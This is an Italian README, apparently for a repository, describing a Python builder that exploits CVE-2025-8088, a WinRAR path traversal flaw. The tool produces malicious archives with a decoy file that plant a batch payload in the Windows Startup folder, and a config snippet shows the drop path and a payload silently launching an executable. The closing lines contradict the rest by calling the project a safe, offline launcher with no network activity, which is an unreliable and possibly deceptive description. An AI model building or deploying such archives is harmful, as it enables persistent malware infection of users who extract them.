
CVE-2025-8088-BUILDER
⚠ Questo strumento è creato esclusivamente a scopo educativo. L'uso non autorizzato al di fuori di ambienti controllati è severamente proibito.
Uno script Python che sfrutta CVE-2025-8088, una vulnerabilità di path traversal in WinRAR, generando un archivio dannoso che inserisce payload eseguibili nella cartella di avvio di Windows utilizzando più livelli di directory relative per garantire un'esecuzione affidabile indipendentemente dalla posizione di estrazione.
Configura il file config.py
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
Per usare il tuo file esca, inserisci il percorso completo al posto del nome.
Esegui lo script:
python CVE-2025-8088.py
L'output apparirà nella cartella output.
Questo strumento è creato esclusivamente a scopo educativo. L'uso non autorizzato al di fuori di ambienti controllati è severamente proibito.
Autore: Desert Scripts
Descrizione:
Un launcher locale e offline che esegue MyAppInstaller.exe.
Nessuna attività di rete. Sicuro e trasparente.